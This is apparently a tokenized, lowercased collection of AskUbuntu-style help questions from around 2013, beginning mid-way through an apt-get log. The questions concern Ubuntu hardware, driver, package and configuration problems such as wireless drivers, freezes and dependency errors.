//ubuntu.cica.es raring-updates/main sources [ 68.3 kb ] get:21 http : //ubuntu.cica.es raring-updates/restricted sources [ 14 b ] get:22 http : //ubuntu.cica.es raring-updates/universe sources [ 72.3 kb ] ign http : //archive.ubuntu.com raring/main translation-en_us ign http : //archive.ubuntu.com raring/restricted translation-en_us ign http : //archive.ubuntu.com raring-updates/main translation-en_us ign http : //archive.ubuntu.com raring-updates/restricted translation-en_us get:23 http : //ubuntu.cica.es raring-updates/multiverse sources [ 2,266 b ] get:24 http : //ubuntu.cica.es raring-updates/main amd64 packages [ 176 kb ] get:25 http : //ubuntu.cica.es raring-updates/restricted amd64 packages [ 14 b ] get:26 http : //ubuntu.cica.es raring-updates/universe amd64 packages [ 146 kb ] get:27 http : //ubuntu.cica.es raring-updates/multiverse amd64 packages [ 3,715 b ] get:28 http : //ubuntu.cica.es raring-updates/main i386 packages [ 174 kb ] get:29 http : //ubuntu.cica.es raring-updates/restricted i386 packages [ 14 b ] get:30 http : //ubuntu.cica.es raring-updates/universe i386 packages [ 147 kb ] get:31 http : //ubuntu.cica.es raring-updates/multiverse i386 packages [ 3,864 b ] get:32 http : //ubuntu.cica.es raring-updates/main translation-en [ 83.1 kb ] hit http : //ubuntu.cica.es raring-updates/multiverse translation-en hit http : //ubuntu.cica.es raring-updates/restricted translation-en get:33 http : //ubuntu.cica.es raring-updates/universe translation-en [ 75.9 kb ] hit http : //ubuntu.cica.es raring-backports/main sources hit http : //ubuntu.cica.es raring-backports/restricted sources hit http : //ubuntu.cica.es raring-backports/universe sources hit http : //ubuntu.cica.es raring-backports/multiverse sources hit http : //ubuntu.cica.es raring-backports/main amd64 packages hit http : //ubuntu.cica.es raring-backports/restricted amd64 packages hit http : //ubuntu.cica.es raring-backports/universe amd64 packages hit http : //ubuntu.cica.es raring-backports/multiverse amd64 packages hit http : //ubuntu.cica.es raring-backports/main i386 packages hit http : //ubuntu.cica.es raring-backports/restricted i386 packages hit http : //ubuntu.cica.es raring-backports/universe i386 packages hit http : //ubuntu.cica.es raring-backports/multiverse i386 packages hit http : //ubuntu.cica.es raring-backports/main translation-en hit http : //ubuntu.cica.es raring-backports/multiverse translation-en hit http : //ubuntu.cica.es raring-backports/restricted translation-en hit http : //ubuntu.cica.es raring-backports/universe translation-en get:34 http : //ubuntu.cica.es raring-security/main sources [ 42.1 kb ] get:35 http : //ubuntu.cica.es raring-security/restricted sources [ 14 b ] get:36 http : //ubuntu.cica.es raring-security/universe sources [ 9,279 b ] get:37 http : //ubuntu.cica.es raring-security/multiverse sources [ 2,266 b ] get:38 http : //ubuntu.cica.es raring-security/main amd64 packages [ 110 kb ] get:39 http : //ubuntu.cica.es raring-security/restricted amd64 packages [ 14 b ] get:40 http : //ubuntu.cica.es raring-security/universe amd64 packages [ 36.5 kb ] get:41 http : //ubuntu.cica.es raring-security/multiverse amd64 packages [ 3,715 b ] get:42 http : //ubuntu.cica.es raring-security/main i386 packages [ 109 kb ] get:43 http : //ubuntu.cica.es raring-security/restricted i386 packages [ 14 b ] get:44 http : //ubuntu.cica.es raring-security/universe i386 packages [ 37.1 kb ] get:45 http : //ubuntu.cica.es raring-security/multiverse i386 packages [ 3,864 b ] get:46 http : //ubuntu.cica.es raring-security/main translation-en [ 56.5 kb ] hit http : //ubuntu.cica.es raring-security/multiverse translation-en hit http : //ubuntu.cica.es raring-security/restricted translation-en get:47 http : //ubuntu.cica.es raring-security/universe translation-en [ 22.8 kb ] ign http : //ubuntu.cica.es raring/main translation-en_us ign http : //ubuntu.cica.es raring/multiverse translation-en_us ign http : //ubuntu.cica.es raring/restricted translation-en_us ign http : //ubuntu.cica.es raring/universe translation-en_us ign http : //ubuntu.cica.es raring-updates/main translation-en_us ign http : //ubuntu.cica.es raring-updates/multiverse translation-en_us ign http : //ubuntu.cica.es raring-updates/restricted translation-en_us ign http : //ubuntu.cica.es raring-updates/universe translation-en_us ign http : //ubuntu.cica.es raring-backports/main translation-en_us ign http : //ubuntu.cica.es raring-backports/multiverse translation-en_us ign http : //ubuntu.cica.es raring-backports/restricted translation-en_us ign http : //ubuntu.cica.es raring-backports/universe translation-en_us ign http : //ubuntu.cica.es raring-security/main translation-en_us ign http : //ubuntu.cica.es raring-security/multiverse translation-en_us ign http : //ubuntu.cica.es raring-security/restricted translation-en_us ign http : //ubuntu.cica.es raring-security/universe translation-en_us fetched 2,260 kb in 34s ( 64.9 kb/s ) reading package lists ... done n : ignoring file 'mqchael-pipelight-precise.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'private-ppa.launchpad.net_commercial-ppa-uploaders_lordofultima_ubuntu.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'sunab-kdenlive-release-raring.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'sunab -- precise.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'sunab-kdenlive-release-precise.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'langdalepl-gvfs-mtp-precise.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'cinelerra-ppa-ppa-oneiric.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'sunab-kdenlive-svn-oneiric.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'oneiric-partner.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'ehoover-compholio-precise.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'google-chrome.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'ubuntu-wine-ppa-oneiric.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'jonoomph-openshot-edge-precise.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'ubuntu-wine-ppa-precise.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'sunab-kdenlive-svn-precise.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'google-talkplugin.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'private-ppa.launchpad.net_commercial-ppa-uploaders_nebula44_ubuntu.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension
347077	full system freeze without explanation , why and what to do ?	so i bought an asus k55v sx085d ( intel i7 3610qm , 6gb ram , nvidia geforce 610m ) and successfully installed ubuntu 12.03.4 ( amd64 ) . i get a message on boot saying : dev/mapper/cryptswap1 is not ready yet or not present . the boot continues past it , and i can log in . after about 2 minutes , the screen freezes , and i ca n't make it recover . in most of the cases , it froze when installing through sowtware center . once when installing mono , once when doing ardour digital workstation , but once it happened when i stuck a pendrive in the usb port . i believe i have all the driver for it to work . any ideas ?
347079	hp pavilion g6 temperatures raises until system shuts down , how to fix this ?	i 'm using hp pavilion g6 laptop , and i recently installed ubuntu 12.04 , from now whenever i use ubuntu my system heats up and unexpectedly shutdowns .
347080	screen brightness not working on dual graphics	i tried this fix to install ati drivers = > how do i get amd/intel hybrid graphics drivers to work ? everythink is excellent without brightness.brightness control is not working . i tried options > brightness & lock , i changed brightness slider but there is no effect how can i fix that problem ? thanks ...
347084	loading current time into mysql database	i have a query which can enter data into mysql database . however , i would like to have the time of an entry entered as well and that entered time should correspond to server time.i am using ubuntu server 12.04 lts below is the code i am using to enter data into the table ( it is embedded in a script ) mysql -uroot -pmysql -- local-infile database -e '' load data local infile a.txt into table tablea columns terminated by '| ' '' i have created the table to have 3 columns with one for the time with datatype labled as timestamp . how can i edit my code so that it can also insert the local time . i am using a lamp stack . to clarify further , if my table is populated like > ip mac time > 10.0.0.97 00 14 2a 2f 72 fe 2012-09-09 23:11:05 and my textfile contains the data 10.0.0.97|00 14 2a 2f 72 ff 10.0.0.98|00 21 33 rt w3 tt and i run the script now , i would expect it to appear in the database as > ip mac > time > 10.0.0.97 00 14 2a 2f 72 fe 2012-09-09 23:11:05 > 10.0.0.97 00 14 2a 2f 72 ff 2013-18-09 16:11:11 > 10.0.0.98 00 21 33 rt w3 tt 2013-18-09 16:11:11
347088	symlink for eclipse	some people have suggested putting the symlink to the eclipse package at /usr/local/bin while others suggest using /usr/bin is there any particular reason for including `` local '' ? see : http : //grainier.net/how-to-install-eclipse-juno-in-ubuntu-13-04/ and http : //ubuntuforums.org/showthread.php ? t=2157452 & p=12792387 # post12792387
347091	best ubuntu-based distro for older computer ?	i am an ubuntu-enthusiast and computer repair business owner . i conviced one of my customers to let me replace his windows vista installation with an ubuntu-based one . i assured him that it would run much faster and be very easy for him to use . he is in his eighties , and slightly more tech-savvy than most people from his generation . all i need is a basic os install without any bells and whistles . he needs to be able to browse the web and check his email , and he likes to play games ( mostly board/strategy/card `` solitaire '' kinds of games ) . his computer is a `` dual core pentium '' -based pc , which came with windows vista pre-installed . he has 2gb of ram . personally , i 'm a huge fan of kde/kubuntu , but i know that it can be a little resource hungry , and he really does n't need the `` extras '' that i enjoy in kde . i am considering lubuntu or xubuntu , and i am also wondering whether i should choose a slightly older release , which may support his older hardware better . does anyone have any experience or expertise in this matter ? what would you recommend if you were in my position ? thanks !
347092	startup application as root when user logs in	normally if i need an application to start at start-up and to run as root i put the application , script or the link in /etc/init.d/ . but what i want to achieve is something different . i want to have an application run by root , but not at system start up , but in the moment any user will successfully pass the login . how to achieve that ? i need this feature for ubuntu 12.04 and the next releases .
347096	install ubuntu in usb drive	how to install ubuntu in pen drive and use it in any computer . liveusb doesnt save my changes and delete files , i dont want that . i want to install as if it was installed in my internal drive
347102	no gui after installing kubuntu	i have a problem with my freshly installed kubuntu distribution . the os installs and shows me the message to reboot the computer now since it has finished the installation . but when i boot , no gui is shown and after a short time some messages show up and i ca n't even write in the console . ( messages differ each time but most of the time it contains something like checking battery state ) . after that it just freezes . i just do n't know what to do and i would be really happy if someone of you could help me . also sorry for the lack of information but i do n't exactly know what 's important to tell . if you need more information just ask .
347103	wireless networks are not showing up for ubuntu 12.04 lts in hp dv5 laptop	i am new to linux.i installed ubuntu 12.04 lts 32bit version newly in my hp dv5 series laptop . now i am not able to connect to a wireless network . i tried installing broadcom sta wireless driver which was displayed as additional driver in the driver section . however installation failed with the error mentioned in /var/log/jockey.log . the error messages seems to be the following : 2013-09-18 18:37:04,310 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-09-18 18:37:04,411 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-09-18 18:37:04,452 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted these are the last three lines in the log file . then i tried installing b43-fwcutter from ubuntu software center based on some info in the ubuntu forums , but that did not help . some basic details as obtained via commands executed in terminal are the following : sudo ifconfig wlan0 up wlan0 : error while getting interface flags : no such device lspci | tail 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.3 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) 00:1f.0 isa bridge : intel corporation ich9m lpc interface controller ( rev 03 ) 00:1f.2 sata controller : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 4 port sata controller [ ahci mode ] ( rev 03 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) 00:1f.6 signal processing controller : intel corporation 82801i ( ich9 family ) thermal subsystem ( rev 03 ) 02:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) request help on how to get this working . previously i had windows vista on my laptop and wifi worked fine then . edited on 19-09-2013 : after checking this link how to fix additional sta driver installation error on 12.04 i tried the solution suggested as my error log jockey.log had a similar error . after trying the below : sudo apt-get install -- reinstall bcmwl-kernel-source i got the below error : error ! bad return status for module build on kernel : 3.8.0-30-generic ( i686 ) consult /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/make.log for more information . fatal : module wl not found . update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.8.0-30-generic the contents of make.log file point to the below : make [ 1 ] : * [ /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.o ] error 1 make : * [ module/var/lib/dkms/bcmwl/6.20.155.1+bdcom/build ] error 2 make : leaving directory `/usr/src/linux-headers-3.8.0-30-generic' further update the below command : rfkill list shows the below output : 0 : hp-wifi : wireless lan soft blocked : no hard blocked : yes 1 : hp-bluetooth : bluetooth soft blocked : no hard blocked : yes request help regarding the same . latest updated as on 12-09-2013 based on the link provided here : enable wireless adaptors on dell 1018 inspiron i was able to reset my bios to factory setting . now the output for rfkill list is : 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : hp-wifi : wireless lan soft blocked : no hard blocked : no 2 : hp-bluetooth : bluetooth soft blocked : no hard blocked : no so now it is no more hardblocked . however wireless network option is still not displayed : ( . an aside observation is that now bluetooth is working fine . request help still .
347104	unable to install openssh server both in command line and from ubuntu software center	reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libglapi-mesa-lts-raring : conflicts : libglapi-mesa libxcb1 : depends : libxau6 but it is not going to be installed depends : libxdmcp6 but it is not going to be installed openssh-server : depends : openssh-client ( = 1:5.9p1-5ubuntu1 ) recommends : xauth but it is not going to be installed recommends : ssh-import-id but it is not going to be installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . in ubuntu software center , following message occurs . the following packages have unmet dependencies : libglapi-mesa-lts-raring : libxcb1 : depends : libc6 ( > = 2.14 ) but 2.15-0ubuntu10.4 is to be installed ssh :
347106	how can i uninstall softmaker office 2012 if i downloaded their deb ?	i downloaded softmaker office 2012 from their website as a deb and installed it . how do i now remove it ? is it done in terminal ? if so what is the command ? i 'm running ubuntu 13.04 on a laptop .
347114	unable to download applications	i am unable to download any application ( even video lan media player ) from the software center . it says `` check your internet connection '' while i have one . help me out . thank you
347115	blkid -o list gives different results with and without sudo	after re-installing my laptop 's windows , my drive d : was corrupted , however , i 'm trying to fix it using ntfsfix or ntfs-3g , but the problem is , when i run : blkid -o list it gives me a result which includes 3 sda* devices , and pretty sure , one of them is my drive d ( sda3 ) , but , when i run exactly the same command with sudo , i get a different result which has only two sda* drives which only includes system reserved drive and c. that 's there , and when i want to run ntfsfix or ntfs-3g , i must have superuser privileges , so when i run sudo ntfs-3g /dev/sda3 /media/windows it says /dev/sda3 does n't exist . i 'm asking , why are the results different ? thanks in advance .
347117	in first was a problem with apt-get and now it 's with the update also	i want to learn more linux , so i choose ubuntu and started learn about it , using a book .. but it 's no easy as i expected . few days ago , i was reading about apt-get and how to change the default repository for the update , i tried to change it and it worked , but some problems start to shows up , like when i execute apt-get upgrade or install lbreakout2 ( or any other package ) i get an error message . now the things are getting worst , a notification appears in the top bar with an error message asking me to open package manger ( which does n't work any more ) or opening the terminal and execute apt-get , i did so , and i executed apt-get check and this the error message i got : root @ salah-latitude-e6400 : /home/salah # apt-get check reading package lists ... error ! e : unable to parse package file /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring_universe_i18n_translation-en ( 1 ) e : problem opening /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-updates_main_binary-i386_packages e : the package lists or status file could not be parsed or opened . and this what i got after running apt-get update : root @ salah-latitude-e6400 : /home/salah # apt-get update hit http : //extras.ubuntu.com raring release.gpg hit http : //extras.ubuntu.com raring release hit http : //us.archive.ubuntu.com raring release.gpg hit http : //extras.ubuntu.com raring/main sources hit http : //extras.ubuntu.com raring/main i386 packages get:1 http : //us.archive.ubuntu.com raring-updates release.gpg [ 933 b ] get:2 http : //us.archive.ubuntu.com raring-backports release.gpg [ 933 b ] get:3 http : //us.archive.ubuntu.com raring-security release.gpg [ 933 b ] hit http : //us.archive.ubuntu.com raring release get:4 http : //us.archive.ubuntu.com raring-updates release [ 40.8 kb ] ign http : //extras.ubuntu.com raring/main translation-en_us ign http : //extras.ubuntu.com raring/main translation-en get:5 http : //us.archive.ubuntu.com raring-backports release [ 40.8 kb ] get:6 http : //us.archive.ubuntu.com raring-security release [ 40.8 kb ] hit http : //us.archive.ubuntu.com raring/main sources hit http : //us.archive.ubuntu.com raring/restricted sources hit http : //us.archive.ubuntu.com raring/universe sources hit http : //us.archive.ubuntu.com raring/multiverse sources hit http : //us.archive.ubuntu.com raring/main i386 packages hit http : //us.archive.ubuntu.com raring/restricted i386 packages hit http : //us.archive.ubuntu.com raring/universe i386 packages hit http : //us.archive.ubuntu.com raring/multiverse i386 packages hit http : //us.archive.ubuntu.com raring/main translation-en hit http : //us.archive.ubuntu.com raring/multiverse translation-en hit http : //us.archive.ubuntu.com raring/restricted translation-en hit http : //us.archive.ubuntu.com raring/universe translation-en get:7 http : //us.archive.ubuntu.com raring-updates/main sources [ 65.8 kb ] get:8 http : //us.archive.ubuntu.com raring-updates/restricted sources [ 14 b ] get:9 http : //us.archive.ubuntu.com raring-updates/universe sources [ 71.9 kb ] get:10 http : //us.archive.ubuntu.com raring-updates/multiverse sources [ 2,266 b ] get:11 http : //us.archive.ubuntu.com raring-updates/main i386 packages [ 167 kb ] get:12 http : //us.archive.ubuntu.com raring-updates/restricted i386 packages [ 14 b ] get:13 http : //us.archive.ubuntu.com raring-updates/universe i386 packages [ 144 kb ] get:14 http : //us.archive.ubuntu.com raring-updates/multiverse i386 packages [ 3,864 b ] hit http : //us.archive.ubuntu.com raring-updates/main translation-en hit http : //us.archive.ubuntu.com raring-updates/multiverse translation-en hit http : //us.archive.ubuntu.com raring-updates/restricted translation-en hit http : //us.archive.ubuntu.com raring-updates/universe translation-en get:15 http : //us.archive.ubuntu.com raring-backports/main sources [ 902 b ] get:16 http : //us.archive.ubuntu.com raring-backports/restricted sources [ 14 b ] get:17 http : //us.archive.ubuntu.com raring-backports/universe sources [ 5,532 b ] get:18 http : //us.archive.ubuntu.com raring-backports/multiverse sources [ 1,403 b ] get:19 http : //us.archive.ubuntu.com raring-backports/main i386 packages [ 565 b ] get:20 http : //us.archive.ubuntu.com raring-backports/restricted i386 packages [ 14 b ] get:21 http : //us.archive.ubuntu.com raring-backports/universe i386 packages [ 6,490 b ] get:22 http : //us.archive.ubuntu.com raring-backports/multiverse i386 packages [ 1,345 b ] hit http : //us.archive.ubuntu.com raring-backports/main translation-en hit http : //us.archive.ubuntu.com raring-backports/multiverse translation-en hit http : //us.archive.ubuntu.com raring-backports/restricted translation-en hit http : //us.archive.ubuntu.com raring-backports/universe translation-en get:23 http : //us.archive.ubuntu.com raring-security/main sources [ 38.5 kb ] get:24 http : //us.archive.ubuntu.com raring-security/restricted sources [ 14 b ] get:25 http : //us.archive.ubuntu.com raring-security/universe sources [ 8,842 b ] get:26 http : //us.archive.ubuntu.com raring-security/multiverse sources [ 2,266 b ] get:27 http : //us.archive.ubuntu.com raring-security/main i386 packages [ 101 kb ] get:28 http : //us.archive.ubuntu.com raring-security/restricted i386 packages [ 14 b ] get:29 http : //us.archive.ubuntu.com raring-security/universe i386 packages [ 34.3 kb ] get:30 http : //us.archive.ubuntu.com raring-security/multiverse i386 packages [ 3,864 b ] get:31 http : //us.archive.ubuntu.com raring-security/main translation-en [ 53.1 kb ] hit http : //us.archive.ubuntu.com raring-security/multiverse translation-en hit http : //us.archive.ubuntu.com raring-security/restricted translation-en hit http : //us.archive.ubuntu.com raring-security/universe translation-en ign http : //us.archive.ubuntu.com raring/main translation-en_us ign http : //us.archive.ubuntu.com raring/multiverse translation-en_us ign http : //us.archive.ubuntu.com raring/restricted translation-en_us ign http : //us.archive.ubuntu.com raring/universe translation-en_us ign http : //us.archive.ubuntu.com raring-updates/main translation-en_us ign http : //us.archive.ubuntu.com raring-updates/multiverse translation-en_us ign http : //us.archive.ubuntu.com raring-updates/restricted translation-en_us ign http : //us.archive.ubuntu.com raring-updates/universe translation-en_us ign http : //us.archive.ubuntu.com raring-backports/main translation-en_us ign http : //us.archive.ubuntu.com raring-backports/multiverse translation-en_us ign http : //us.archive.ubuntu.com raring-backports/restricted translation-en_us ign http : //us.archive.ubuntu.com raring-backports/universe translation-en_us ign http : //us.archive.ubuntu.com raring-security/main translation-en_us ign http : //us.archive.ubuntu.com raring-security/multiverse translation-en_us ign http : //us.archive.ubuntu.com raring-security/restricted translation-en_us ign http : //us.archive.ubuntu.com raring-security/universe translation-en_us fetched 839 kb in 39s ( 21.1 kb/s ) reading package lists ... error ! e : unable to parse package file /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring_universe_i18n_translation-en ( 1 ) e : problem opening /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring-updates_main_binary-i386_packages e : the package lists or status file could not be parsed or opened . please help , and thanks in advance .
347118	how do i mark a file as executable on 13.04 ?	i just got 13.04 and need to know how to mark a file as executable . so if someone could tell me how that would be great . when i go to permissions the execute thing is not there .
347119	blinking black pattern of dots and lines on the screen	there is a black pattern of dots and lines blinking randomly on my screen . it appears randomly , sometimes every 30 seconds , sometimes it does n't occur at all for a week or so . i had this issue for several months now , both in 13.04 and 13.10 . it looks more or less like the screenshot this gentleman has taken , although the pattern is different : random black dot on the screen it seems to be linked to mouse pointer movement . in rare cases , the pattern stays on the screen if i happen to stop moving the mouse or scrolling at the right moment . as soon as i move the mouse or scroll , the pattern vanishes . i managed to take some screenshots , but i 'm not sure how to upload them here . i run 13.10 ( 64 ) on an intel ivybridge mobile . edit : new drivers seem to have done the trick . edit : the problem persists . back to square one .
347120	help regarding driver installations in ubuntu for hp pavilion g6 2007 tx laptop	i am not a regular ubuntu user . after suggestions from my friends , i have switched over to ubuntu . i have hp pavilion g6 2007tx laptop . i have installed ubuntu 13.04 64bit . i have a hybrid driver intel and ati raedon graphic drivers . decrease the temperature of laptop and increase battery life again , i would like to mention that i am new to linux . please do respond .
347121	sound menu options have disappeared	i do not see any options for 5.1 sound . i see only 2 speakers , but i have 5.1 speakers . i also have a 5.1 sound card -- asus xonar dx . how can i fix this ?
347123	trying to install libjpeg8 seems to prevent apt-get upgrade	i 'm trying for quite some time to solve an irritating problem . i 'm getting a `` hole in the bucket '' experience : sudo apt-get upgrade [ sudo ] password for olav : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libjpeg8 : breaks : libjpeg8 : i386 ( ! = 8d-1 ) but 8c-2ubuntu7 is installed libjpeg8 : i386 : breaks : libjpeg8 ( ! = 8c-2ubuntu7 ) but 8d-1 is installed e : unmet dependencies . try using -f. but if i try using -f , this is what appears on the screen : sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following package was automatically installed and is no longer required : libjpeg-turbo8 : i386 use 'apt-get autoremove ' to remove it . the following extra packages will be installed : libjpeg8 : i386 the following packages will be upgraded : libjpeg8 : i386 1 upgraded , 0 newly installed , 0 to remove and 519 not upgraded . 1 not fully installed or removed . need to get 0 b/132 kb of archives . after this operation , 258 kb of additional disk space will be used . do you want to continue [ y/n ] ? ( reading database ... 482927 files and directories currently installed . ) preparing to replace libjpeg8 : i386 8c-2ubuntu7 ( using ... /libjpeg8_8d-1_i386.deb ) ... unpacking replacement libjpeg8 : i386 ... dpkg : error processing /var/cache/apt/archives/libjpeg8_8d-1_i386.deb ( -- unpack ) : trying to overwrite '/usr/lib/i386-linux-gnu/libjpeg.so.8 ' , which is also in package libjpeg-turbo8 : i386 1.2.1-0ubuntu2 configured to not write apport reports errors were encountered while processing : /var/cache/apt/archives/libjpeg8_8d-1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i tried all kinds of lines like : sudo apt-get clean sudo apt-get autoclean sudo apt-get dist install sudo apt-get remove and so on those commands i found on different sites where i was looking for a solution who can help to fix this ?
347125	how do i mark a file as executable on xubuntu ?	i need to know how to mark a file as executable but the check box is not there .
347126	the '' interface '' on qjackctl is grayed out , how do i fix this ?	i was working with qjackctl and for some reason the interface button in the settings area is grayed out . it looks like this : does anyone know how to fix this problem ? i would like to check to make sure that the interface is set correctly . thank you all in advance for all of your help .
347128	ubuntu 13 will not boot up	i am running a intel core 2 duo on a epic motherboard ep-850 . i am able to install 10.04 and it works but i can not install or upgrade to 13 . the video card is a intel series 4 onboard and i have 4gigs of ram and an 80 gig solid state hd . when i put the live cd/dvd in it starts the boot process i see one many two screens and then it goes blank . i get no activity on the cd/dvd drive . any ideas .
347129	do i have to specify the package version when reporting a bug with ubuntu-bug ?	reporting a bug from ubuntu using the ubuntu-bug [ package ] command adds a couple of attached files to the bug , that include relevant information about a bug and that package . however , when filling the form describing the bug there 's a note requiring the package version and a command to find it out . is it truly necessary or the ubuntu-bug command handles that ?
347130	can not connect to windows8 using nautilus/smb	in nautilus ( running ubuntu 13.04 ) i am trying to connect to a windows8 machine using the following url : smb : //user @ xxx.xx.xx.xxx followed by entering the password that i also use when doing a remote desktop connection . but i get : unhandled error message : failed to retrieve share list from server : connection timed out do i need to configure something on ubuntu/window8 to establish a connection using smb ? i have tried to follow this guide : http : //www.noobslab.com/2012/03/configure-samba-sharing-between-ubuntu.html # windows_to_ubuntu and share a folder on the windows8 machine , but still get the same error as above . from commandline i have also tried to mount it manually : root @ ubuntu : /mnt/win8 # mount -t cifs -o username=user //xxx.xx.xx.xxx/sharedfolder /mnt/win8/ but i get : mount error ( 115 ) : operation now in progress refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) which is not that helpful . if i run : smbtree -b -n i do n't see the machine that i would like to mount . only a bunch of printers and my own local virtual machines .
347133	suspected kernel panic in lubuntu 13.04	recently , i re-installed lubuntu 13.04 because of some error in the last os installation . today , if i try to go to chromium , it works for a while , and then says , `` aw , snap '' because it runs out of ram space . a few seconds later , the entire screen goes black . it goes black , and in seconds , the screen is filled with the terminal code-lines . some words what i could actually understand there , was `` kernel panic '' . i did some research , and i realized that this thingy saves our hardware from physical damage . to answer this question , i would like you to answer these : what is this kernel panic ? is it really related to hardware problems ? what can i do to stop this ? because it is seriously annoying me . and just so you know , this is the third re-installation of lubuntu . if you could solve this soon , i 'd be very glad . if there is something i need to specify , please comment . thanks in advance . edit : this question is closed . apparently , i have found the answer . check below .
347135	install from iso file	as of 13.04 , ubuntu install no longer fits on a cd , it requires a dvd [ 800+ mib ] . for me , it is `` economically inconvenient '' to get a dvd recorder . my preferred installation method would be to put the 13.10 .iso file in /boot/grub/iso [ iirc ] , then let grub boot from it . that part requires some strange incantations in the grub.cfg , but it should be do-able . i have booted this way , but not installed . the problem is , the installer tells me the partition containing /boot is not being formatted . all system directories will be destroyed during the install . the answer on `` questions/157055 '' assumes i have the iso alone on a partition . that is n't the case for me : /boot is in my root partition . there seems to be absolutely no reason why an install needs to blow away /boot . am i missing something here ? can this be done at all ? i should mention , it is quite possible to simply do aptitude dist-upgrade -t `` saucy '' . that is even easier , except that if something goes wrong i no longer have a useable system -- and murphy is sitting on top of my computer .
347137	how can i fix my wna3100 netgear wireless card always being stuck on `` configuring device '' ?	my wireless card ( wna3100 netgear ) just wo n't connect to the internet . it 's always stuck on `` configuring device . '' i 'm not much of a unix person so any help would be greatly appreciated . i know there 's a lot of posts about this subject already , but i ca n't follow reading the posts because there 's too much linux language i ca n't follow , so please treat me like an idiot and spell things out for me . thanks . here 's some info on my setup : lsusb : bus 002 device 005 : id 0846:9020 netgear , inc. wna3100 ( v1 ) wireless-n 300 [ broadcom bcm43231 ] bus 004 device 002 : id 045e:028e microsoft corp. xbox360 controller bus 004 device 003 : id 093a:2510 pixart imaging , inc. optical mouse bus 006 device 002 : id 0b57:8039 beijing hanwangtechnology co. , ltd bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11g essid : off/any mode : managed frequency:2.462 ghz access point : not-associated bit rate:300 mb/s tx-power:32 dbm rts thr:2347 b fragment thr:2346 b power management : off link quality:0 signal level:0 noise level:0 rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 ndiswrapper -l bcmwlhigh5 : driver installed device ( 0846:9020 ) present thanks guys for all the help .
